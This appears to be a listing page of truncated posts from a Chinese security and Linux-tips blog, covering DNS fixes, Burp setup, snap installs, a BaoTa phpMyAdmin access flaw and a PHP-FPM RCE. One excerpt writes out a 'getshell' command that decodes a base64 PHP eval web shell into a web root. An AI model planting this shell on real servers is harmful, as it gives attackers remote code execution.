2024-12-28 厉飞雨 阅读(689) 评论(0) 赞(13)

<h1>说明</h1> <p>每次重启网络dns就会被覆盖127.0.0.53，域名就会解析失败。这是systemd-resolvd的问题，直接关闭就行。</p> <pre><code>vi /etc/resolv.conf <p>nameserver 8.8.8.8</p> <...

2024-12-28 厉飞雨 阅读(265) 评论(0) 赞(14)

<p>目前支持tp3和tp5日志泄露文件扫描</p> <p>近期还会持续更新，赏个star吧。</p> <p><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/4PzD69su9gUUcMkFsEpUJ3uWpySSicPGCia7RIyFvRibLfYLUibC...

2024-12-28 厉飞雨 阅读(321) 评论(0) 赞(13)

<h2>php代码执行&amp;命令执行</h2> <h3>getshell</h3> <pre><code>echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d &gt; /var/www/html/shell.php <p&...

2024-12-28 厉飞雨 阅读(292) 评论(0) 赞(14)

<p>1、打开burp挂上代理访问，浏览器访问http://burp/点击右上角CA Certificate下载证书<br /> 2、安装certutil，<strong>sudo apt-get install libnss3-tools</strong><br /> 3、burp导出der证书，把后缀改名crt&l...

2024-12-28 厉飞雨 阅读(433) 评论(0) 赞(13)

<h1>前言</h1> <p>宝塔牛逼</p> <h1>影响版本</h1> <p>Linux面板7.4.2版本/Windows面板6.8版本</p> <h1>漏洞</h1> <p>由于phpmyadmin没加鉴权 访问IP:888/pma可直接登陆...

2024-12-28 厉飞雨 阅读(386) 评论(0) 赞(15)

<h1>前言</h1> <p>昨天考了个360众测(没过)。实战题全是业务题，源码审计就有好几个，奈何不会php把我卡的死死的。就做了一半时间就没了，总结起来就是太菜了。<br /> 于是乎想来学习一下代码审计，由于我用的是ubuntu系统，所以就用cobra吧。</p> <h1>介绍</h1>...

2024-12-28 厉飞雨 阅读(237) 评论(0) 赞(14)

<p>命令：<code>sudo usermod -aG vboxusers &lt;username&gt;</code></p> <p>重启系统</p>

2024-12-28 厉飞雨 阅读(265) 评论(0) 赞(13)

<h1>前言</h1> <p>什么是v2ray不用多说</p> <h1>下载</h1> <p>https://github.com/jiangxufeng/v2rayL/releases</p>

2024-12-28 厉飞雨 阅读(349) 评论(0) 赞(14)

<h1>前言</h1> <p>直接使用snap安装慢的一批，所以下载snap包到本地离线安装。</p> <h1>命令</h1> <pre><code>sudo snap install xxx.snap --dangerous </code></pre>

2024-12-28 厉飞雨 阅读(289) 评论(0) 赞(13)

<p><strong>0x00简介：</strong></p> <p>2019年10月22日在国外上某技术大牛公开了在PHP-FPM中新修补的RCE。</p> <p><strong>0x01漏洞评判：</strong></p> <p><str...